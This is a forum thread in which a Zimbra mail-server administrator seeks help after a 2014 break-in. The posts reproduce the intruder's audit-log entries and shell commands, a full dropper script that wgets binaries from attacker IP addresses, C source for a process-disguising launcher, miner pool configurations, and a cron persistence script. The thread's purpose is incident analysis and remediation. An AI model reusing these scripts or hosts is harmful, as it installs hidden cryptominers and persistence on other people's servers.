Results 1 to 9 of 9

Thread: "Zimbra Account" Being Hacked and creating new admin acount

  1. #1
    ettorebb is offline Junior Member
    Join Date
    Oct 2010
    Posts
    9
    Rep Power
    4

    Exclamation "Zimbra Account" Being Hacked and creating new admin acount

    Guys,

    i'm having some troubles with my Zimbra server. My ssh zimbra account was hacked. This is a legacy server so i don't know if it is already an installed exploit .

    I'm having these at my audi.log:

    2014-03-10 10:25:26,926 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=AdminAuth; account=zimbra;
    2014-03-10 10:25:26,968 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=Auth; account=zimbra; protocol=soap;
    2014-03-10 10:25:29,938 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=CreateAccount; name=newadmin@mydomain.com.br;
    2014-03-10 10:25:31,628 INFO [btpool0-127://myserverip:7071/service/admin/soap] [name=zimbra;ip=hackerip;] security - cmd=ModifyAccount; name=operator01@mydomain.com.br; zimbraIsAdminAccount=TRUE;

    Also i discovered that the hacker used these commands:

    ls -la /opt/zimbra/zimlets-deployed;rm -rf /var/tmp/*;killall -9 a;killall -9 b;killall -9 minerd32;killall -9 minerd64
    cd /var/tmp;touch a;touch b;chmod 444 a;chmod 444 b;chattr +isa a b;chattr +ia a
    killall -9 freshclam
    ps x
    wget 212.227.137.251/img/common/zmb && sh zmb;rm -rf zmb;rm -rf /var/tmp/*
    cat /opt/zimbra/docs/idnmulti.txt/9cdfb439c7876e703e307864c9167a15


    AND this is the script that he gets with wget:

    #!/bin/sh
    unset HISTFILE;unset SAVEHIST
    bit=`getconf LONG_BIT`
    killall -9 a b minerd64 minerd32
    killall -9 a b minerd64 minerd32
    kill -9 `pidof minerd64`;kill -9 `pidof b`;ls -la /var/tmp /dev/shm /tmp;rm -rf /var/tmp/a /var/tmp/b /var/tmp/xd.pl /var/tmp/_tmp39* /var/tmp/miner*
    kill -9 `pidof minerd32`;kill -9 `pidof a`
    kill -9 `pidof kpoll`;kill -9 `pidof dsys`
    killall -9 kpoll dsys
    rm -rf /tmp/kpoll*
    rm -rf /tmp/dsys*
    mkdir /opt/zimbra/docs
    mkdir /opt/zimbra/docs/idnmulti.txt
    cp -f /opt/zimbra/docs/* /opt/zimbra/docs/idnmulti.txt
    cd /opt/zimbra/docs/idnmulti.txt
    echo "1">>9cdfb439c7876e703e307864c9167a10
    echo "1">>9cdfb439c7876e703e307864c9167a11
    echo "1">>9cdfb439c7876e703e307864c9167a12
    echo "1">>9cdfb439c7876e703e307864c9167a13
    echo "1">>9cdfb439c7876e703e307864c9167a14
    echo "1">>9cdfb439c7876e703e307864c9167a16
    echo "1">>9cdfb439c7876e703e307864c9167a17
    echo "1">>9cdfb439c7876e703e307864c9167a18
    echo "1">>9cdfb439c7876e703e307864c9167a19
    echo "1">>9cdfb439c7876e703e307864c9167a20
    echo "1">>9cdfb439c7876e703e307864c9167a21
    echo "1">>9cdfb439c7876e703e307864c9167a22
    echo "1">>9cdfb439c7876e703e307864c9167a23
    echo "0">>9cdfb439c7876e703e307864c9167a24
    echo "0">>9cdfb439c7876e703e307864c9167a25
    echo "0">>9cdfb439c7876e703e307864c9167a26;echo "0">>9cdfb439c7876e703e307864c9167a27;echo "0">>9cdfb439c7876e703e307864c9167a28;echo "0">>9cdfb439c7876e703e307864c9167a29;wget 212.227.137.251/img/common/top_box.jpg/xh$bit -O x;wget 212.227.137.251/img/common/top_box.jpg/xh.c -O x.c;wget 212.227.137.251/img/common/top_box.jpg/minerd$bit -O freshclam

    #wget 188.165.237.153/downloads/9cdfb439c7876e703e307864c9167a15 -O 9cdfb439c7876e703e307864c9167a15
    cd /opt/zimbra/docs/idnmulti.txt/;wget 84.19.183.3/img/common/9cdfb439c7876e703e307864c9167a15 -O 9cdfb439c7876e703e307864c9167a15

    chmod 755 *;chmod +x *;gcc -o x x.c;./x -s "amavisd (ch6-avail)" -d ./freshclam -c 9cdfb439c7876e703e307864c9167a15 -s 3 -R 5 -q -B >/dev/null 2>&1
    rm -rf x.c

    crontab -l>cron.d
    echo "* * * * * /opt/zimbra/docs/idnmulti.txt/zmbd >/dev/null 2>&1" >> cron.d
    crontab cron.d
    crontab -l | grep zmbd
    wget 212.227.137.251/img/common/zmbd -O zmbd >> /dev/null &&
    chmod u+x zmbd
    rm -rf /etc/cron.hourly/update
    cp zmbd /etc/cron.hourly/
    #chattr -ia bash
    #chattr -ia *

    /opt/zimbra/bin/zmzimletctl undeploy com_zimbra_example_simplejspaction
    /opt/zimbra/bin/zmzimletctl undeploy com_zimbra_example_simplejspaction2
    rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_pwn
    rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_example_simplejspaction2
    rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_example_simplejspaction
    rm -rf /opt/zimbra/jetty/work/zimlet/jsp/org/apache/jsp/com_005fzimbra_005fexample_005fsimplejspaction
    rm -rf /opt/zimbra/jetty/work/zimlet/jsp/org/apache/jsp/com_005fzimbra_005fexample_005fsimplejspaction2

    /opt/zimbra/bin/zmmailboxctl restart >/dev/null 2>&1;/opt/zimbra/bin/zmmailboxdctl restart >/dev/null 2>&1


    ls -la /opt/zimbra/zimlets-deployed/com_zimbra_email_dns;rm -rf /opt/zimbra/zimlets-deployed/com_zimbra_email_dns

    rm -rf /opt/zimbra/docs/idnmulti.txt/zmb
    rm -rf $0


    I Know that he installed something in here, but i just don't know what i is.

    Please help me!

  2. #2
    Wasowski is offline Senior Member
    Join Date
    Oct 2011
    Posts
    54
    Rep Power
    3

    Default

    you are now mining for him



    http://212.227.137.251/img/common/top_box.jpg/xh.c
    /*
    EXPERiMENTAL FOR ALL NEWBS. STFU + BYE.. KTHX.
    */

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <string.h>
    #include <fcntl.h>
    #include <pwd.h>
    #include <grp.h>

    void usage(char *progname);

    int changeown (char *str)

    {

    char user[256], *group;
    struct passwd *pwd;
    struct group *grp;

    uid_t uid;
    gid_t gid;



    memset(user, '\0', sizeof(user));
    strncpy(user, str, sizeof(user));



    for (group = user; *group; group++)

    if (*group == ':')

    {

    *group = '\0';
    group++;
    break;

    }



    if (pwd = getpwnam(user))

    {

    uid = pwd->pw_uid;
    gid = pwd->pw_gid;

    } else uid = (uid_t) atoi(user);



    if (*group)

    if (grp = getgrnam(group)) gid = grp->gr_gid;
    else gid = (gid_t) atoi(group);



    if (setgid(gid)) {

    perror("XXX Err0r: Can't set 31337 GiD");
    return 0;

    }



    if (setuid(uid))

    {

    perror("XXX Err0r: Can't set 31337 UiD");
    return 0;

    }



    return 1;



    }



    char *fullpath(char *cmd)

    {

    char *p, *q, *filename;
    struct stat st;



    if (*cmd == '/')

    return cmd;



    filename = (char *) malloc(256);

    if (*cmd == '.')

    if (getcwd(filename, 255) != NULL)

    {

    strcat(filename, "/");
    strcat(filename, cmd);
    return filename;

    }

    else

    return NULL;



    for (p = q = (char *) getenv("PATH"); q != NULL; p = ++q)

    {

    if (q = (char *) strchr(q, ':'))
    *q = (char) '\0';



    snprintf(filename, 256, "%s/%s", p, cmd);


    if (stat(filename, &st) != -1
    && S_ISREG(st.st_mode)
    && (st.st_mode&S_IXUSR || st.st_mode&S_IXGRP || st.st_mode&S_IXOTH))

    return filename;



    if (q == NULL)

    break;

    }



    free(filename);

    return NULL;

    }

    void
    usage(char *progname)

    {

    fprintf(stderr, "well it could be just another system update mr admin "
    "sweet successfull researching (c) 2008\n\nwe have some superi0r options ahead:\n"

    "-s ***\tSexual procedure\n"
    "-d\t\tRun a jew as a daemon/system/slave (opti0nal in iraq)\n"
    "-u uid[:gid]\tWe could even Change UiD/GiD, use another user. maybe for apaches (opti0nal in arabia)\n"
    "-p filename\tLamely Save PiD to filename (universally optional)\n\n"

    "We give you examples: %s -s \"/sbin/mingetty tty2\" -d -p well.31337 ./bad bad.idea\n\n",progname);

    exit(1);

    }





    int main(int argc,char **argv)

    {

    char c;
    char fake[256];
    char *progname, *fakename;
    char *pidfile, *fp;
    char *execst;

    FILE *f;

    int runsys=0, null;
    int j,i,n,pidnum;
    char **newargv;



    progname = argv[0];
    if(argc<2) usage(progname);



    for (i = 1; i < argc; i++)

    {

    if (argv[i][0] == '-')

    switch (c = argv[i][1])

    {

    case 's': fakename = argv[++i]; break;
    case 'u': changeown(argv[++i]); break;
    case 'p': pidfile = argv[++i]; break;
    case 'd': runsys = 1; break;

    default: usage(progname); break;

    }

    else break;

    }



    if (!(n = argc - i) || fakename == NULL) usage(progname);



    newargv = (char **) malloc(n * sizeof(char **) + 1);
    for (j = 0; j < n; i++,j++) newargv[j] = argv[i];
    newargv[j] = NULL;



    if ((fp = fullpath(newargv[0])) == NULL) { perror("Full path seek"); exit(1); }
    execst = fp;

    if (n > 1)

    {

    memset(fake, ' ', sizeof(fake) - 1);
    fake[sizeof(fake) - 1] = '\0';
    strncpy(fake, fakename, strlen(fakename));
    newargv[0] = fake;

    }

    else newargv[0] = fakename;


    if (runsys)

    {

    if ((null = open("/dev/null", O_RDWR)) == -1)

    {

    perror("XXX Err0r: /dev/null");
    return -1;

    }



    switch (fork())

    {

    case -1:

    perror("XXX Err0r: F0RK-1");
    return -1;

    case 0:

    setsid();
    switch (fork())

    {

    case -1:

    perror("XXX Err0r: F0RK-2");
    return -1;

    case 0:

    umask(0);
    close(0);
    close(1);
    close(2);
    dup2(null, 0);
    dup2(null, 1);
    dup2(null, 2);

    break;

    default:

    return 0;

    }

    break;
    default:
    return 0;

    }

    }



    waitpid(-1, (int *)0, 0);

    pidnum = getpid();



    if (pidfile != NULL && (f = fopen(pidfile, "w")) != NULL)

    {

    fprintf(f, "%d\n", pidnum);
    fclose(f);

    }



    fprintf(stderr,"==> Elitename: %s PiDJews: %d\n",fakename,pidnum);
    execv(execst, newargv);
    perror("WTFuX... We Couldnt exekute.. we are not r00t or n0t cyute?");
    return -1;

    }

    ------------------------
    http://188.165.237.153/downloads/9cd...307864c9167a15
    {
    "url" : "stratum+tcp://pool1.us.multipool.us:7777",
    "user" : "parCore.80",
    "pass" : "xXx"
    }

    ----------------
    http://84.19.183.3/img/common/9cdfb4...307864c9167a15
    {
    "url" : "stratum+tcp://mnt.coins4everyone.com:3445",
    "user" : "parCore.good",
    "pass" : "xXx"
    }




    ------------

    http://212.227.137.251/img/common/zmbd

    #!/bin/sh
    zmbpro=`ps x|grep ch6-avail|grep -v grep|awk '{print $1}'`
    if [ "$zmbpro" != "" ]
    then nohup wget 212.227.137.251/img/common/zmb && sh zmb >> /dev/null &
    else
    echo "MERGE!!!"

    fi

  3. #3
    Wasowski is offline Senior Member
    Join Date
    Oct 2011
    Posts
    54
    Rep Power
    3

    Default

    maybe more infos here: Zimbra hack

    and here: zimbra 0-day

    PS: I tried to use pastebin but it doesnt seems to work here, any reason ? Thanks.

  4. #4
    ettorebb is offline Junior Member
    Join Date
    Oct 2010
    Posts
    9
    Rep Power
    4

    Default

    Quote Originally Posted by Wasowski View Post
    maybe more infos here: Zimbra hack

    and here: zimbra 0-day - Page 3

    PS: I tried to use pastebin but it doesnt seems to work here, any reason ? Thanks.
    TKS!

    I can't find any process that may the name "minerd64 or minerd32" how could i stop it and, most importantly, how can i block this invasion, since it happens even with an powerfull password (18 chars, uppercase, special chars, numbers etc)?

  5. #5
    phoenix is online now Zimbra Consultant & Moderator
    Join Date
    Sep 2005
    Location
    Vannes, France
    Posts
    23,488
    Rep Power
    56

    Default

    You should always provide the exact version of ZCS that's in use by posting the output of the following command:

    Code:
    zmcontrol -v
    Quote Originally Posted by ettorebb View Post
    I can't find any process that may the name "minerd64 or minerd32" how could i stop it and, most importantly, how can i block this invasion, since it happens even with an powerfull password (18 chars, uppercase, special chars, numbers etc)?
    If you're not on a current version of ZCS then I suggest you get your system upgraded as soon as possible: Urgency on Security Fixes for Bug 80338 and Bug 84547
    Regards


    Bill


    Acompli: A new adventure for Co-Founder KevinH.

  6. #6
    ettorebb is offline Junior Member
    Join Date
    Oct 2010
    Posts
    9
    Rep Power
    4

    Default

    Quote Originally Posted by phoenix View Post
    You should always provide the exact version of ZCS that's in use by posting the output of the following command:

    Code:
    zmcontrol -v
    If you're not on a current version of ZCS then I suggest you get your system upgraded as soon as possible: Urgency on Security Fixes for Bug 80338 and Bug 84547
    Thanks Bill, i'm in an outdated version (Release 7.1.4_GA_2555.UBUNTU8 UBUNTU8 FOSS edition) and i'm providing it's update ASAP probably on saturday 15th.

    When i update the server i will give an feedback on the situation!

    Best regards!

  7. #7
    Wasowski is offline Senior Member
    Join Date
    Oct 2011
    Posts
    54
    Rep Power
    3

    Default

    Quote Originally Posted by ettorebb View Post
    TKS!

    how can i block this invasion, since it happens even with an powerfull password (18 chars, uppercase, special chars, numbers etc)?
    are you the only one who knows that password ? Have you written the password in a file or on a paper ?
    You may have a key logger on one of your ssh client side.

    If you have thousands of attack (failed login) each day , you might want to use fail2ban, but I doubt a brute force attack was what they used to get access to your server.

    Edit: And if you cant find the process, maybe the installation (script) failed
    Last edited by Wasowski; 03-11-2014 at 08:47 AM.

  8. #8
    ettorebb is offline Junior Member
    Join Date
    Oct 2010
    Posts
    9
    Rep Power
    4

    Default

    Thanks to Bill i found the script for creating accounts.... Zimbra - 0day exploit / Privilegie escalation via LFI

    I am 100% sure that no one haves my password and i only access it from a really secure backtrack machine that i have installed from zero.

    i shall use fail2ban just in case

    I haven't writted my password in anywere other than my brain. Anyway, i've updated my password and i'll update the server this weekend and post the results. Thanks again for your attention!

    best regards!
    Last edited by ettorebb; 03-13-2014 at 06:26 AM.

  9. #9
    ettorebb is offline Junior Member
    Join Date
    Oct 2010
    Posts
    9
    Rep Power
    4

    Default

    Guys,

    i've updated to Release 7.2.6_GA_2926.UBUNTU8 UBUNTU8 FOSS edition, and everything is fine now.

    I've tested some exploits on my server and any of them have worked.

    Thanks for everyone,

    Best regards.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Replies: 0
    Last Post: 08-21-2013, 10:39 PM
  2. Replies: 1
    Last Post: 08-21-2012, 06:17 PM
  3. Replies: 0
    Last Post: 05-25-2011, 11:14 AM
  4. Replies: 0
    Last Post: 05-20-2009, 05:14 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •